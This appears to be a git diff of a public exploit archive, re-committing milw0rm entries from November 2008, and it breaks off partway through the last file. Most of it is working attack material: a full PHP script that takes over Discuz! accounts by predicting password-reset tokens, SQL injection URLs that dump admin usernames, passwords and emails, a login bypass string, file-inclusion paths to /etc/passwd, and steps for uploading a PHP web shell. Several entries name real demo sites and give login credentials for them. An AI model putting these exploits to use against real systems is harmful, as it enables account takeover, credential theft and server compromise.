-$cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
-$data = "POST ".$path."member.php HTTP/1.1\r\n";
-$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$data .= "Referer: http://$host$path\r\n";
-$data .= "Host: $host\r\n";
-$data .= "Content-Length: ".strlen($cmd)."\r\n";
-$data .= "Connection: close\r\n\r\n";
-$data .= $cmd;
-
-fputs($fp, $data);
-
-$resp = '';
-
-while ($fp && !feof($fp))
-$resp .= fread($fp, 1024);
-
-fclose($fp);
-
-preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
-
-if (!$sid)
-exit("Exploit Failed!\n");
-
-$seed = getseed();
-if ($seed) {
-mt_srand($seed);
-random();
-mt_rand();
-$id = random();
-
-$fp = fsockopen($host, 80);
-
-$cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
-$data = "POST ".$path."member.php HTTP/1.1\r\n";
-$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$data .= "Referer: http://$host$path\r\n";
-$data .= "Host: $host\r\n";
-$data .= "Content-Length: ".strlen($cmd)."\r\n";
-$data .= "Connection: close\r\n\r\n";
-$data .= $cmd;
-
-fputs($fp, $data);
-
-$resp = '';
-
-while ($fp && !feof($fp))
-$resp .= fread($fp, 1024);
-
-if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
-exit("Expoilt Success!\nUser New Password:\t123456\n");
-else
-exit("Exploit Failed!\n");
-} else
-exit("Exploit Failed!\n");
-} else
-exit("Exploit Failed!\n");
-
-function getseed()
-{
-global $sid;
-
-for ($seed = 0; $seed <= 1000000; $seed ++) {
-mt_srand($seed);
-$id = random(6);
-if ($id == $sid[1])
-return $seed;
-}
-return false;
-}
-
-function random($length = 6)
-{
-$hash = '';
-$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
-$max = strlen($chars) - 1;
-for ($i = 0; $i < $length; $i ++)
-$hash .= $chars[mt_rand(0, $max)];
-
-return $hash;
-}
-
-?>
-
-# milw0rm.com [2008-11-22]
+#!/usr/bin/php
+<?php
+
+print_r('
++---------------------------------------------------------------------------+
+Discuz! Reset User Password Exploit
+by 80vul
+team: http://www.80vul.com
++---------------------------------------------------------------------------+
+');
+
+if ($argc < 6) {
+print_r('
++---------------------------------------------------------------------------+
+Usage: php '.$argv[0].' host path user mail uid
+host: target server (ip/hostname)
+path: path to discuz
+user: user login name
+mail: user login mail
+uid: user login id
+Example:
+php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
++---------------------------------------------------------------------------+
+');
+exit;
+}
+
+error_reporting(7);
+ini_set('max_execution_time', 0);
+
+$host = $argv[1];
+$path = $argv[2];
+$user = $argv[3];
+$mail = $argv[4];
+$uid = $argv[5];
+
+$fp = fsockopen($host, 80);
+
+$data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
+$data .= "Host: $host\r\n";
+$data .= "Keep-Alive: 300\r\n";
+$data .= "Connection: keep-alive\r\n\r\n";
+
+fputs($fp, $data);
+
+$resp = '';
+
+while ($fp && !feof($fp)) {
+$resp .= fread($fp, 1024);
+preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
+if ($hash)
+break;
+}
+
+if ($hash) {
+$cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
+$data = "POST ".$path."member.php HTTP/1.1\r\n";
+$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$data .= "Referer: http://$host$path\r\n";
+$data .= "Host: $host\r\n";
+$data .= "Content-Length: ".strlen($cmd)."\r\n";
+$data .= "Connection: close\r\n\r\n";
+$data .= $cmd;
+
+fputs($fp, $data);
+
+$resp = '';
+
+while ($fp && !feof($fp))
+$resp .= fread($fp, 1024);
+
+fclose($fp);
+
+preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
+
+if (!$sid)
+exit("Exploit Failed!\n");
+
+$seed = getseed();
+if ($seed) {
+mt_srand($seed);
+random();
+mt_rand();
+$id = random();
+
+$fp = fsockopen($host, 80);
+
+$cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
+$data = "POST ".$path."member.php HTTP/1.1\r\n";
+$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$data .= "Referer: http://$host$path\r\n";
+$data .= "Host: $host\r\n";
+$data .= "Content-Length: ".strlen($cmd)."\r\n";
+$data .= "Connection: close\r\n\r\n";
+$data .= $cmd;
+
+fputs($fp, $data);
+
+$resp = '';
+
+while ($fp && !feof($fp))
+$resp .= fread($fp, 1024);
+
+if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
+exit("Expoilt Success!\nUser New Password:\t123456\n");
+else
+exit("Exploit Failed!\n");
+} else
+exit("Exploit Failed!\n");
+} else
+exit("Exploit Failed!\n");
+
+function getseed()
+{
+global $sid;
+
+for ($seed = 0; $seed <= 1000000; $seed ++) {
+mt_srand($seed);
+$id = random(6);
+if ($id == $sid[1])
+return $seed;
+}
+return false;
+}
+
+function random($length = 6)
+{
+$hash = '';
+$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
+$max = strlen($chars) - 1;
+for ($i = 0; $i < $length; $i ++)
+$hash .= $chars[mt_rand(0, $max)];
+
+return $hash;
+}
+
+?>
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7186.txt b/platforms/php/webapps/7186.txt
index e5ff8c845..d6bd1d5fd 100755
--- a/platforms/php/webapps/7186.txt
+++ b/platforms/php/webapps/7186.txt
@@ -1,36 +1,36 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## Vlog System V1.1 ( blog.php user )
-##
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f
-##
-## Email : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>¬e=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--
-##
-########################
-########################
-
-#######################################################################################################
-#######################################################################################################
- -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-11-22]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## Vlog System V1.1 ( blog.php user )
+##
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f
+##
+## Email : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.Target.com/blog.php?user=<< REAL USER NAME HERE >>¬e=906+AND+1=0+UNION+SELECT+1,2,Concat_Ws(0x3a,user(),@@version),4,5,6,7,8--
+##
+########################
+########################
+
+#######################################################################################################
+#######################################################################################################
+ -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7188.txt b/platforms/php/webapps/7188.txt
index 6a0456407..28e1af7da 100755
--- a/platforms/php/webapps/7188.txt
+++ b/platforms/php/webapps/7188.txt
@@ -1,42 +1,42 @@
-[~] geta php Real Estate Remote File upload
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Date: 22.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-first register to site
-
-login to site and edit your profile
-
-upload your_shell.php
-
-your_shell.php path:
-
-localhost/script/re_images/[ID]_logo_your_shell.php
-
-example for demo:
-
-login: http://www.getaphpsite.com/demos/realty/login.php
-
-user: zorlu
-
-passwd: zorlu1
-
-shell:
-
-http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-22]
+[~] geta php Real Estate Remote File upload
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Date: 22.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+first register to site
+
+login to site and edit your profile
+
+upload your_shell.php
+
+your_shell.php path:
+
+localhost/script/re_images/[ID]_logo_your_shell.php
+
+example for demo:
+
+login: http://www.getaphpsite.com/demos/realty/login.php
+
+user: zorlu
+
+passwd: zorlu1
+
+shell:
+
+http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7189.txt b/platforms/php/webapps/7189.txt
index 47c855dd5..5bad242bf 100755
--- a/platforms/php/webapps/7189.txt
+++ b/platforms/php/webapps/7189.txt
@@ -1,42 +1,42 @@
-[~] geta php cardealers Remote File upload
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Date: 22.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-first register to site
-
-login to site and edit your profile
-
-upload your_shell.php
-
-your_shell.php path:
-
-localhost/script/re_images/[ID]_logo_your_shell.php
-
-example for demo:
-
-login: http://www.getaphpsite.com/demos/cardealers/login.php
-
-user: zorlu
-
-passwd: zorlu1
-
-shell:
-
-http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-22]
+[~] geta php cardealers Remote File upload
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Date: 22.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+first register to site
+
+login to site and edit your profile
+
+upload your_shell.php
+
+your_shell.php path:
+
+localhost/script/re_images/[ID]_logo_your_shell.php
+
+example for demo:
+
+login: http://www.getaphpsite.com/demos/cardealers/login.php
+
+user: zorlu
+
+passwd: zorlu1
+
+shell:
+
+http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-22]
diff --git a/platforms/php/webapps/7190.txt b/platforms/php/webapps/7190.txt
index b213028e3..65abd11a1 100755
--- a/platforms/php/webapps/7190.txt
+++ b/platforms/php/webapps/7190.txt
@@ -1,56 +1,56 @@ - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - + + - + Ez Ringtone Manager Multiple Vulnerabilities + - + + - + Discovered by b3hz4d + - + + - + WwW.DeltaHacking.Net + - + + - + + - + + - ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ - - - APA Center of Yazd University - (https://www.ircert.cc) - - -AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) -DATE : 22 nov 2008 -SITE : WwW.DeltaHacking.Net - - -##################################################### - -APPLICATION : Ez Ringtone Manager -DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143 -VENDOR : http://www.scriptsez.net/ -DEMO : http://demo.scriptsez.net/ringtones/demo.html - -##################################################### - - -[+] vuln : ./main.php - ./template.php - - - vulnerability is in main.php that included in template.php - - -[1] Remote File Disclosure: - -[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php - http://victim.com/ringtones/template.php?action=detail&id=../admin.php - -[2] Local File Inclusion: - -[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd - http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd - -########################################################################################################## - -# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com # - -########################################################################################################## - -# milw0rm.com [2008-11-22] + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + + + Ez Ringtone Manager Multiple Vulnerabilities + + + + + + Discovered by b3hz4d + + + + + + WwW.DeltaHacking.Net + + + + + + + + + + + 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + APA Center of Yazd University + (https://www.ircert.cc) + + +AUTHOR : b3hz4d (Seyed Behzad Shaghasemi) +DATE : 22 nov 2008 +SITE : WwW.DeltaHacking.Net + + +##################################################### + +APPLICATION : Ez Ringtone Manager +DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143 +VENDOR : http://www.scriptsez.net/ +DEMO : http://demo.scriptsez.net/ringtones/demo.html + +##################################################### + + +[+] vuln : ./main.php + ./template.php + + + vulnerability is in main.php that included in template.php + + +[1] Remote File Disclosure: + +[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php + http://victim.com/ringtones/template.php?action=detail&id=../admin.php + +[2] Local File Inclusion: + +[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd + http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd + +########################################################################################################## + +# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com # + +########################################################################################################## + +# milw0rm.com [2008-11-22] diff --git a/platforms/php/webapps/7195.txt b/platforms/php/webapps/7195.txt index 557940e38..c7ada30ec 100755 --- a/platforms/php/webapps/7195.txt +++ b/platforms/php/webapps/7195.txt 
@@ -1,34 +1,34 @@ -================================================================================================================== -= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = -= S N N N A A K K E S T E A A M M M M = -+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + -= S N N N A A K K E S T E A A M M M = -= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = -===================================================SNAKES TEAM==================================================== -+ = -= Script:hostindex Remote SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - :::::Mail: snakespc@gmail.com::::::: - = = - = = ::::script Demo: http://turnkeyzone.com/demos/hostindex/::::= = - = = - = Script site: turnkeyzone.com "directory.php" = - ===================================Snakespc====================================== - -Exploit: -http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())-- -******** -demo: -http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())-- -=================================================================================================================== - -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: -ALL www.Snakespc.com/SC >>>> Members -Str0ke ....Milxw0rm -=================================================================================================================== - -# milw0rm.com [2008-11-23] +================================================================================================================== += SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = += S N N N A A K K E S T E A A M M M M = ++ SSSSS N N N AAAAAA KKK EEEEE 
SSSSS T EEEEE AAAAAA M M M M + += S N N N A A K K E S T E A A M M M = += SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = +===================================================SNAKES TEAM==================================================== ++ = += Script:hostindex Remote SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + :::::Mail: snakespc@gmail.com::::::: + = = + = = ::::script Demo: http://turnkeyzone.com/demos/hostindex/::::= = + = = + = Script site: turnkeyzone.com "directory.php" = + ===================================Snakespc====================================== + +Exploit: +http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())-- +******** +demo: +http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())-- +=================================================================================================================== + +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: +ALL www.Snakespc.com/SC >>>> Members +Str0ke ....Milxw0rm +=================================================================================================================== + +# milw0rm.com [2008-11-23] diff --git a/platforms/php/webapps/7197.txt b/platforms/php/webapps/7197.txt index 2151b79ea..784fe6315 100755 --- a/platforms/php/webapps/7197.txt +++ b/platforms/php/webapps/7197.txt 
@@ -1,21 +1,21 @@
--============================================-
-Autore: x0r - Evolution Team
-Msn: andry2000@hotmail.it
-Cms: Goople Cms 1.7
-Bug: Arbitrary File Upload
-Download:
-http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
--============================================-
-Exploit:
-
-Logg youself like a normal user, and then go to:
-
-/win/content/upload.php and upload your php shell
-
-after go to: /user/doc/shell.php
-
-Greetz: Amore mio sono 47 giorni che stiamo insieme, 47 giorni
-fantastici...sei la mia vita... A + M = L O V E
- Ti Amo Bimba Mia... 8\10\2008
-
-# milw0rm.com [2008-11-23]
+-============================================-
+Autore: x0r - Evolution Team
+Msn: andry2000@hotmail.it
+Cms: Goople Cms 1.7
+Bug: Arbitrary File Upload
+Download:
+http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
+-============================================-
+Exploit:
+
+Logg youself like a normal user, and then go to:
+
+/win/content/upload.php and upload your php shell
+
+after go to: /user/doc/shell.php
+
+Greetz: Amore mio sono 47 giorni che stiamo insieme, 47 giorni
+fantastici...sei la mia vita... A + M = L O V E
+ Ti Amo Bimba Mia... 8\10\2008
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7198.txt b/platforms/php/webapps/7198.txt
index c020e6f92..005f24e7c 100755
--- a/platforms/php/webapps/7198.txt
+++ b/platforms/php/webapps/7198.txt
@@ -1,34 +1,34 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== - - Script: NetArtMedia Cars Portal Remote SQL Injection Vulnerability - -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: snakespc@gmail.com::::::: = = - = = - = Sript : http://www.netartmedia.net/carsportal/ = - = www.netartmedia.net = - =================================== Snakespc ====================================== - - -[*]Exploit: -Using FireFox -view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users-- - -=================================================================================================================== -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: -ALL www.Snakespc.com/sc >>>> Members -str0ke.....>>>>.....milw0rm -=================================================================================================================== - -# milw0rm.com [2008-11-23] +================================================================================================================== + SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S T 
E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== + + Script: NetArtMedia Cars Portal Remote SQL Injection Vulnerability + +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: snakespc@gmail.com::::::: = = + = = + = Sript : http://www.netartmedia.net/carsportal/ = + = www.netartmedia.net = + =================================== Snakespc ====================================== + + +[*]Exploit: +Using FireFox +view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users-- + +=================================================================================================================== +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: +ALL www.Snakespc.com/sc >>>> Members +str0ke.....>>>>.....milw0rm +=================================================================================================================== + +# milw0rm.com [2008-11-23] diff --git a/platforms/php/webapps/7199.txt b/platforms/php/webapps/7199.txt index 6ac37229d..99285f834 100755 --- a/platforms/php/webapps/7199.txt +++ b/platforms/php/webapps/7199.txt 
@@ -1,34 +1,34 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== - - Script: NetArtMedia blog system Remote SQL Injection Vulnerability - -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: snakespc@gmail.com::::::: = = - = = - = Sript : http://www.netartmedia.net/blogsystem/ = - = www.netartmedia.net = - =================================== Snakespc ====================================== - - -[*]Exploit: -Using FireFox -view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users-- - -=================================================================================================================== -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: -ALL www.Snakespc.com/sc >>>> Members -str0ke.....>>>>.....milw0rm -=================================================================================================================== - -# milw0rm.com [2008-11-23] +================================================================================================================== + SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + S N N N A A K K E S 
T E A A M M M + SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M +===================================================SNAKES TEAM==================================================== + + Script: NetArtMedia blog system Remote SQL Injection Vulnerability + +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = + = = + = = :::::Mail: snakespc@gmail.com::::::: = = + = = + = Sript : http://www.netartmedia.net/blogsystem/ = + = www.netartmedia.net = + =================================== Snakespc ====================================== + + +[*]Exploit: +Using FireFox +view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users-- + +=================================================================================================================== +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or:: +ALL www.Snakespc.com/sc >>>> Members +str0ke.....>>>>.....milw0rm +=================================================================================================================== + +# milw0rm.com [2008-11-23] diff --git a/platforms/php/webapps/720.pl b/platforms/php/webapps/720.pl index 8d583cc05..b6a11b288 100755 --- a/platforms/php/webapps/720.pl +++ b/platforms/php/webapps/720.pl @@ -94,6 +94,6 @@ for($a=0;$a<=$b;$a++) $sitevul = $vul[$a].$cmd; if($sitevul !~/http/){ $sitevul = 'http://'.$sitevul; } $res = get($sitevul) or next; -} - -# milw0rm.com [2004-12-25] +} + +# milw0rm.com [2004-12-25] diff --git a/platforms/php/webapps/7200.txt b/platforms/php/webapps/7200.txt index f3ad342b7..f0d72dcf8 100755 --- a/platforms/php/webapps/7200.txt +++ b/platforms/php/webapps/7200.txt 
@@ -1,43 +1,43 @@
-[~] PG Real Estate Solution Auth Bypass
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Date: 23.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
-[~]
-[~] dork: "Powered by PG Real Estate Solution - real estate web site design" ( aha size dork :( ( )
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-exploit for demo:
-
-login: http://www.realtysoft.pro/realestate/demo/admin/index.php
-
-username: admin ' or ' 1=1--
-
-password: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-23]
+[~] PG Real Estate Solution Auth Bypass
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Date: 23.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
+[~]
+[~] dork: "Powered by PG Real Estate Solution - real estate web site design" ( aha size dork :( ( )
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+exploit for demo:
+
+login: http://www.realtysoft.pro/realestate/demo/admin/index.php
+
+username: admin ' or ' 1=1--
+
+password: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7201.txt b/platforms/php/webapps/7201.txt
index f30279bbd..b1b5951b5 100755
--- a/platforms/php/webapps/7201.txt
+++ b/platforms/php/webapps/7201.txt
@@ -1,43 +1,43 @@
-[~] PG Roomate Finder Solution Auth Bypass
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Date: 23.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
-[~]
-[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design" ( aha size dork :( ( )
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin
-
-
-exploit for demo:
-
-login: http://www.realtysoft.pro/roommate/demo/admin/index.php
-
